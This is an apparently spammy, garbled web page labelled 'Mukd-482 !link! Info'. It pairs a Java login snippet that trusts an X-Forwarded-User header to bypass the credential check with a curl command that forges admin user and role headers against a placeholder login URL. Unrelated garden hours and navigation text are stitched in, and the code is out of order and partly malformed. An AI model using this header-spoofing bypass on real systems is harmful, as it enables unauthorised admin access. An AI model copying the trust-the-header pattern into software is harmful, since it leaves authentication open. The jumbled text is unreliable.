Mukd-482 !link! Info

if (request.getHeader("X-Forwarded-User") != null && isTrustedProxy(request)) // Bypass normal credential check user = userService.loadUserByUsername(request.getHeader("X-Forwarded-User")); else // Normal authentication flow user = authService.authenticate(username, password);

curl -sk -c "$COOKIE_JAR" -X POST "$TARGET" \ -H "Content-Type: application/json" \ -H "X-Forwarded-User: admin" \ -H "X-Forwarded-Role: ADMIN" \ -d '"username":"foo","password":"bar"' \ -o /dev/null mukd-482

TARGET="https://vulnerable.example.com/login" COOKIE_JAR=$(mktemp) if (request

Mukd-482 !link! Info

Support

Leadership

Garden Hours of Operation

Garden Café Hours